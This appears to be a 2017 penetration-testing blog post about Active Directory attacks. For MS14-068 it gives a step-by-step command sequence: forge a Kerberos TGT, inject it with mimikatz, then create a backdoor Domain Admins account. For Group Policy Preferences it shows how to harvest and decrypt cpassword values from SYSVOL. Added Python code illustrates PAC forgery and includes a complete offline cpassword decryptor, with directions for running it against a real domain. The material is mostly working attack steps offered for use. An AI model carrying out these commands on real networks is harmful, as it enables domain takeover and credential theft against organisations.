A few domain-penetration tricks

Author: admin  Category: penetration testing  Published: 2017-11-09 11:13

Keeping a backup of these here; I have been using them a lot lately.

MS14-068 exploitation:

Generate the TGT. The exploit needs the SID of the domain account you already have; whoami /all prints it:

whoami /all

python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com

or, with the compiled build of the same tool:

ms14068.exe -u admin@xxx.com -p password -s sid -d dc.xxx.com

Here -u is any ordinary domain user and -p that user's password, -s is that user's SID, and -d is the domain controller that will be asked to issue the ticket.

This writes TGT_admin@xxx.com.ccache to the current directory.

Inject the TGT into the current logon session (pass-the-ccache):

klist
klist purge
mimikatz.exe "kerberos::ptc c:\TGT_admin@xxx.com.ccache"

klist shows the tickets the session already holds; purge them first so that the forged TGT is the one that gets used for the next service request.

If it worked, the DC's admin share is readable:

dir \\dc.xxx.com\c$

Then create an account and put it in Domain Admins:

net user fuckadmin xxxxx@password /add /domain
net group "Domain Admins" fuckadmin /add /domain

Tools:

https://www.t00ls.net/viewthread.php?tid=28207&from=favorites
https://github.com/bidord/pykek
https://github.com/gentilkiwi/kekeo
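Why the steps above work: before MS14-068 (CVE-2014-6324) the KDC verified a PAC signature with whatever checksum type the PAC itself declared, and an unkeyed type such as KERB_CHECKSUM_RSA_MD5 (the one pykek uses) can be computed by anyone. A forged PAC that lists the admin group RIDs therefore validated; the patched KDC only accepts a keyed checksum under the krbtgt key. The following is an added illustration written for this page, not code from pykek or from the original post. The PAC byte layout here is a simplification (RIDs followed by a SignatureType/Signature block, not real NDR/PACTYPE), the krbtgt key and the user RID 1105 are constructed, and the real exploit additionally has to obtain a PAC-less TGT and carry the forged PAC in the TGS-REQ, which is not shown.

```python
import hashlib
import hmac
import struct

# Kerberos checksum types (RFC 3961 / RFC 4757 / MS-PAC).
KERB_CHECKSUM_RSA_MD5 = 7            # plain MD5: no key involved, anyone can produce it
KERB_CHECKSUM_HMAC_MD5 = 0xFFFFFF76  # -138: HMAC-MD5 keyed with the RC4 krbtgt key
KEYED_CHECKSUM_TYPES = {KERB_CHECKSUM_HMAC_MD5}
KERB_NON_KERB_CKSUM_SALT = 17        # key-usage number used for PAC signatures

# Group RIDs pykek writes into its forged PAC: Domain Users plus the admin groups.
PYKEK_GROUP_RIDS = (513, 512, 520, 518, 519)
SIG_LEN = 16

def rc4_hmac_checksum(key, usage, data):
    """RFC 4757 section 4: HMAC-MD5 over MD5(usage || data) with a derived signing key."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    tmp = hashlib.md5(struct.pack("<I", usage) + data).digest()
    return hmac.new(ksign, tmp, hashlib.md5).digest()

def pac_checksum(ctype, data, key=None):
    """Compute a PAC signature of the requested type over data (signature bytes already zeroed)."""
    if ctype == KERB_CHECKSUM_RSA_MD5:
        return hashlib.md5(data).digest()
    if ctype == KERB_CHECKSUM_HMAC_MD5:
        if key is None:
            raise ValueError("keyed checksum needs the krbtgt key")
        return rc4_hmac_checksum(key, KERB_NON_KERB_CKSUM_SALT, data)
    raise ValueError("unsupported checksum type %#x" % ctype)

def build_pac(user_rid, group_rids, ctype, key=None):
    """Simplified PAC (assumption for this example): user RID, group count, group RIDs,
    then a PAC_SIGNATURE_DATA-style block (SignatureType, Signature).
    The signature covers the whole PAC with the Signature bytes zeroed."""
    logon_info = struct.pack("<II", user_rid, len(group_rids))
    logon_info += struct.pack("<%dI" % len(group_rids), *group_rids)
    unsigned = logon_info + struct.pack("<I", ctype) + bytes(SIG_LEN)
    return logon_info + struct.pack("<I", ctype) + pac_checksum(ctype, unsigned, key)

def split_pac(pac):
    """Return (pac with zeroed signature, checksum type, signature) for the layout above."""
    body, ctype_bytes, sig = pac[:-(SIG_LEN + 4)], pac[-(SIG_LEN + 4):-SIG_LEN], pac[-SIG_LEN:]
    return body + ctype_bytes + bytes(SIG_LEN), struct.unpack("<I", ctype_bytes)[0], sig

def pac_group_rids(pac):
    user_rid, count = struct.unpack("<II", pac[:8])
    return struct.unpack("<%dI" % count, pac[8:8 + 4 * count])

def kdc_accepts_pre_ms14_068(pac, krbtgt_key):
    """Vulnerable behaviour: verify with whatever checksum type the PAC names."""
    zeroed, ctype, sig = split_pac(pac)
    try:
        expected = pac_checksum(ctype, zeroed, krbtgt_key)
    except ValueError:
        return False
    return hmac.compare_digest(expected, sig)

def kdc_accepts_post_ms14_068(pac, krbtgt_key):
    """Patched behaviour: only a keyed checksum under the krbtgt key proves the KDC issued the PAC."""
    zeroed, ctype, sig = split_pac(pac)
    if ctype not in KEYED_CHECKSUM_TYPES:
        return False
    return hmac.compare_digest(pac_checksum(ctype, zeroed, krbtgt_key), sig)

# Constructed sample: a krbtgt key the attacker does not know, and a low-privilege user (RID 1105).
KRBTGT_KEY = hashlib.md5(b"constructed-krbtgt-secret").digest()  # RC4-HMAC keys are 16 bytes
FORGED_PAC = build_pac(1105, PYKEK_GROUP_RIDS, KERB_CHECKSUM_RSA_MD5)      # no key needed
GENUINE_PAC = build_pac(1105, (513,), KERB_CHECKSUM_HMAC_MD5, KRBTGT_KEY)  # what the DC issues

if __name__ == "__main__":
    for name, pac in (("forged", FORGED_PAC), ("genuine", GENUINE_PAC)):
        print(name, pac_group_rids(pac),
              "vulnerable KDC:", kdc_accepts_pre_ms14_068(pac, KRBTGT_KEY),
              "patched KDC:", kdc_accepts_post_ms14_068(pac, KRBTGT_KEY))
```

The forged PAC carries RID 512 (Domain Admins) and is accepted by the vulnerable check and rejected by the patched one; the genuine PAC passes both, and a forged PAC that tries the keyed type with a guessed key fails everywhere, which is exactly the property the fix restored.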

GPP (Group Policy Preferences) exploitation

The encrypted password (the cpassword attribute) can sit in any of these files under SYSVOL:

Groups.xml
Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

Map the share with any domain account, list SYSVOL recursively and search the listing for the files above:

net use \\aaainc.ad password /user:aaainc.ad\username

dir \\aaainc.ad\SYSVOL /s /a > sysvol.txt

findstr /i "groups.xml" sysvol.txt


Decryption (the AES key is published in Microsoft's GPP documentation, so any cpassword can be decrypted offline):

Set-ExecutionPolicy Bypass
powershell -ep bypass
Import-Module .\GPP.ps1
Get-DecryptedCpassword xxxxxxxxxxxxxx

The first two lines are alternatives: either change the execution policy or start a shell that ignores it. xxxxxxxxxxxxxx is the cpassword value copied out of the XML. Note that in PowerSploit's Get-GPPPassword.ps1 the decrypt helper is nested inside Get-GPPPassword, so with that file you call Get-GPPPassword (which walks SYSVOL itself); the GPP.ps1 used here is a local copy that exposes Get-DecryptedCpassword directly.

Script:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
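The whole GPP procedure in one place, as an added example written for this page (not PowerSploit's code or the original post's): restore the base64 padding that GPP strips, decrypt with the published AES-256 key and an all-zero IV, drop the PKCS#7 padding and decode UTF-16LE, then pull the cpassword out of a Groups.xml the way the XML is laid out. AES is implemented with the standard library so the script runs offline; the Groups.xml below is constructed for the example (the account name aaainc.ad\svc_backup is made up), and its cpassword is a sample value that has circulated publicly.

```python
import base64
import xml.etree.ElementTree as ET

# The AES-256 key Microsoft published for GPP cpassword (MS-GPPREF 2.2.1.1.4); the IV is all zeros.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# --- minimal AES-256-CBC decryption with the standard library only, so this runs offline ---
def xtime(a):
    a <<= 1
    return a ^ 0x11B if a & 0x100 else a

def gf_mul(a, b):  # multiplication in GF(2^8)
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = xtime(a), b >> 1
    return r

def build_sbox():  # multiplicative inverse followed by the affine transform
    rot = lambda x, n: ((x << n) | (x >> (8 - n))) & 0xFF
    sbox = [0x63] + [0] * 255
    for a in range(1, 256):
        inv = next(b for b in range(1, 256) if gf_mul(a, b) == 1)
        sbox[a] = inv ^ rot(inv, 1) ^ rot(inv, 2) ^ rot(inv, 3) ^ rot(inv, 4) ^ 0x63
    return sbox

SBOX = build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]

def expand_key(key):  # FIPS-197 key schedule; returns one 16-byte round key per round
    nk, nr = len(key) // 4, len(key) // 4 + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 1
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = xtime(rcon)
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]
        w.append([x ^ y for x, y in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)]

def decrypt_block(round_keys, block):  # state kept column-major: byte index 4*c + r
    s = [b ^ k for b, k in zip(block, round_keys[-1])]
    for rnd in range(len(round_keys) - 2, -1, -1):
        s = [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] ^ k for b, k in zip(s, round_keys[rnd])]           # InvSubBytes + AddRoundKey
        if rnd:                                                             # InvMixColumns
            s = [gf_mul(s[c], m[0]) ^ gf_mul(s[c + 1], m[1]) ^ gf_mul(s[c + 2], m[2]) ^ gf_mul(s[c + 3], m[3])
                 for c in range(0, 16, 4)
                 for m in ((14, 11, 13, 9), (9, 14, 11, 13), (13, 9, 14, 11), (11, 13, 9, 14))]
    return bytes(s)

def decrypt_cpassword(cpassword):
    """cpassword -> clear text: restore base64 padding, AES-256-CBC with zero IV, strip PKCS#7, UTF-16LE."""
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))  # GPP strips the trailing '='
    round_keys, prev, plain = expand_key(GPP_KEY), bytes(16), b""
    for i in range(0, len(data), 16):
        plain += bytes(x ^ y for x, y in zip(decrypt_block(round_keys, data[i:i + 16]), prev))
        prev = data[i:i + 16]
    return plain[:-plain[-1]].decode("utf-16-le")

# Attribute naming the account in the various GPP files (userName in Groups/Drives, runAs in
# ScheduledTasks, accountName in Services, username in Printers/DataSources).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def extract_gpp_passwords(xml_text):
    """Return (account, clear-text password) for every Properties element that carries a cpassword."""
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        if props.get("cpassword"):
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
            found.append((account, decrypt_cpassword(props.get("cpassword"))))
    return found

# Constructed Groups.xml in the GPP layout; the cpassword is a publicly circulated sample value.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" image="2"
        changed="2017-11-01 10:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="aaainc.ad\\svc_backup"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for account, password in extract_gpp_passwords(SAMPLE_GROUPS_XML):
        print(account, password)
```

To use it against a real domain, read each of the six XML files that findstr turns up in sysvol.txt and pass the file contents to extract_gpp_passwords; everything needed for decryption is in the file and the published key, no domain privilege beyond read access to SYSVOL is required.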





References:
https://www.trustedsec.com/2014/12/ms14-068-full-compromise-step-step/
http://www.polaris-lab.com/index.php/2017/01/
https://github.com/Twi1ight/AD-Pentest-Script






